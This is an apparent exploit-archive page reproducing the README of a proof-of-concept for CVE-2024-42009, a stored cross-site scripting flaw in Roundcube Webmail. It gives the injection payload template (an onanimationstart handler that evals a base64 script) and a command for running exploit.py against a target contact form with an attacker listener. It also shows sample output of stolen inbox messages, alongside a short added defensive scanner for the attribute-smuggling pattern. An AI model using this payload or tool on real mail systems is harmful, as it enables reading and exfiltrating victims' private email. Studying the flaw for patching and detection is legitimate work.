PoC details: 09b8748d9f5a72166abb5497df528382386477f9

Source
Related vulnerability
Title: Roundcube Webmail security vulnerability (CVE-2024-42009)
Description: Roundcube Webmail is an open-source, browser-based IMAP client with support for address book management, message search, spell checking and more. Roundcube Webmail 1.5.7 and earlier, and 1.6.x versions before 1.6.8, contain a security vulnerability: a cross-site scripting flaw that allows a remote attacker to steal and send the victim's emails via a crafted e-mail message.
Description
CVE-2024-42009 Proof of Concept
Introduction
# CVE-2024-42009 PoC: Email Capture Listener & XSS Exploit in Roundcube Webmail

## Overview

This repository contains a proof-of-concept (PoC) exploit for **CVE-2024-42009**, a stored Cross-Site Scripting (XSS) vulnerability in Roundcube Webmail version 1.6.7 and several other versions. The exploit demonstrates how an attacker can inject malicious JavaScript into a message and abuse a desanitization issue in the parsing of the message's HTML; in this example the injected script is used to exfiltrate email content from the victim's inbox, but it could equally be used to take over the victim's browser.

## Vulnerability Details

### CVE Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a crafted e-mail message that abuses a Desanitization issue in message_body() in program/actions/mail/show.php.

### XSS Payload Explanation (for this example)

The exploit uses a CSS animation trigger for XSS execution:

```html
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>
```

Roundcube renders the message `<body>` as a `<div>`, so the payload has to be shaped to survive that rewrite; that is why the `onanimationstart` attribute is used to call `eval`, which in turn runs more complex JavaScript once the CSS animation starts. For a full explanation of how the exploit works and where the vulnerabilities in Roundcube lie, read [this article](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/#desanitization-in-inline-email-rendering-cve202442009).
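A defender-side counterpart to the payload shape above, added here as an example and not taken from the PoC or from Roundcube: a small scanner that parses message HTML with Python's `html.parser` and flags attribute values that themselves carry an inline event handler or a `style=` declaration, the smuggling pattern this payload relies on. The sample messages are constructed, and `alert(1)` stands in for the encoded payload.

```python
"""Flag attribute smuggling in message HTML of the kind used against CVE-2024-42009.

Added detection example, not the PoC's own code. The payload shape on this page hides a
style= declaration and an event handler inside the quoted value of an unrelated attribute
(name=), so an attribute value that itself reads like a run of attributes is the signal.
"""
import re
from html.parser import HTMLParser

# `on<event>=` or `style=` nested in another attribute's value, preceded by start of
# value, whitespace or a quote. The boundary keeps URLs such as ?style=dark from matching.
SMUGGLED_ATTR = re.compile(r"(?:^|[\s\"'])(on[a-z]+|style)\s*=", re.IGNORECASE)


class SmuggledAttributeScanner(HTMLParser):
    """Collects (tag, attribute, value) triples that warrant blocking or review."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            if name.startswith("on"):
                # A genuine inline handler: never legitimate in mail content.
                self.findings.append((tag, name, value))
            elif SMUGGLED_ATTR.search(value):
                # A handler or style= hidden inside some other attribute's value.
                self.findings.append((tag, name, value))


def scan_message_html(html):
    """Return every suspicious (tag, attribute, value) found in the HTML string."""
    scanner = SmuggledAttributeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed samples: the first mirrors the README payload shape (quote closed, alert(1)
# standing in for the encoded payload); the second is an ordinary message.
MALICIOUS_SAMPLE = ('<body title="bgcolor=foo" name="bar style=animation-name:'
                    'progress-bar-stripes onanimationstart=alert(1) foo=bar">hi</body>')
BENIGN_SAMPLE = '<body><p title="Quarterly report">Please find attached...</p></body>'

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_message_html(sample))
```

The check only inspects attribute values, so it is cheap enough to run on every inbound message at the gateway or as a mail-filter rule alongside the vendor fix.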

### Scope

- This exploit was tested only on Roundcube Webmail version 1.6.7
- The victim must open the message to see its contents
- May fail if a Content Security Policy (CSP) is properly configured

## Usage

### Dependencies

Install required Python packages:

```bash
python3 -m venv venv
# activate the virtual environment so the packages land inside it
. venv/bin/activate
python3 -m pip install -r requirements.txt
```

### Command Line Arguments

```bash
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
```

- **Target URL**: In this case we are using the contact form endpoint which handles messages and then forwards them (e.g., `http://email.company.local/contact`)
- **Recipient email**: Valid email address that will receive the malicious message 
- **Listener host**: Your box's IP address accessible from the target
- **Listener port**: Available port for the HTTP server (e.g., 4444)

### Example Usage

```bash
python3 exploit.py -u http://webmail.target.com/contact -r admin@target.com -l 192.168.1.100 -p 4444
```

### Expected Output

```
[*] Crafting payload for http://webmail.target.com/contact with recipient admin@target.com
[*] Sending payload to http://webmail.target.com/contact with recipient admin@target.com  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: john.doe@company.com
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!
```

## References

### Vulnerability Research
- [SonarSource Blog: Government Emails at Risk - Critical Cross-Site Scripting Vulnerability in Roundcube Webmail](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)
- [SonarSource Demonstration Video](https://www.youtube.com/watch?v=X7UX7b7Tkrk)

## Legal Disclaimer

⚠️ **IMPORTANT**: This proof-of-concept is provided for **educational and authorized testing purposes only**. Use it responsibly; this account is not responsible for any damage done by others.
File snapshot

```
[4.0K] /data/pocs/09b8748d9f5a72166abb5497df528382386477f9
├── [9.1K] exploit.py
├── [3.9K] README.md
└── [ 605] requirements.txt

0 directories, 3 files
```